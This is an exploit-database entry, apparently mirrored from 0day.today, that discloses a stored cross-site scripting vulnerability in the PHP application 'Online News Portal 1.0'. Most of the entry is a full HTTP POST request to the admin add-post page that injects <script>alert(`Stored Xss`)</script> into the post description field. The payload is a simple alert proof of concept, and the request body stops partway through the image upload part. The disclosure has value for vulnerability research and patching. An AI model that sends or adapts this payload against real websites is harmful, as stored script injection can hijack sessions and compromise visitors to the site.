id: 35955
date: 03/16/2021
title: Online News Portal 1.0 Cross Site Scripting Vulnerability
author: Richard Jones
cves: 

# Exploit Title: Online News Portal | Stored Cross-Site Scripting 
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

POST /newsportal/admin/add-post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/newsportal/admin/add-post.php
Content-Type: multipart/form-data; boundary=---------------------------41052496821120247431948536870
Content-Length: 1105
Origin: http://localhost
Connection: close
Cookie: PHPSESSID=el2er006ddftfemargc4fnqkbj
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

-----------------------------41052496821120247431948536870
Content-Disposition: form-data; name="posttitle"

StoredForLife
-----------------------------41052496821120247431948536870
Content-Disposition: form-data; name="category"

3
-----------------------------41052496821120247431948536870
Content-Disposition: form-data; name="subcategory"

4
-----------------------------41052496821120247431948536870
Content-Disposition: form-data; name="postdescription"

<script>alert(`Stored Xss`)</script>
-----------------------------41052496821120247431948536870
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------41052496821120247431948536870
Content-Disposition: form-data; name="postimage"; filename="index.jpg"
Content-Type: image/jpeg

#  0day.today [2023-03-25]  #